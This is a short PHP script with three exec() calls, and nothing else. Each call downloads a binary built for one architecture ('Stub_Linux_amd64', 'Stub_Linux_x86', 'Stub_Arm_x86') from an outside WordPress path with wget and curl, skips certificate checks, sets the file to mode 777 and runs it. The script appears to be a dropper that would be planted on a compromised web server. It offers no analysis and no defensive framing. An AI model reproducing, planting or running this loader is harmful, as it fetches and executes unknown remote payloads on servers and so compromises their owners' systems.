<?
echo exec('wget http://oluwaglobalholding.co.uk/wp/Stub_Linux_amd64  --no-check-certificate ; curl http://oluwaglobalholding.co.uk/wp/Stub_Linux_amd64 --output Stub_Linux_amd64; chmod 777 Stub_Linux_amd64 ; ./Stub_Linux_amd64');
echo exec('wget http://oluwaglobalholding.co.uk/wp/Stub_Linux_x86 --no-check-certificate ; curl http://oluwaglobalholding.co.uk/wp/Stub_Linux_x86 --output Stub_Linux_x86 ; chmod 777 Stub_Linux_x86 ; ./Stub_Linux_x86');
echo exec('wget http://oluwaglobalholding.co.uk/wp/Stub_Arm_x86 --no-check-certificate ; curl http://oluwaglobalholding.co.uk/wp/Stub_Arm_x86 --output Stub_Arm_x86 ; chmod 777 Stub_Arm_x86 ; ./Stub_Arm_x86');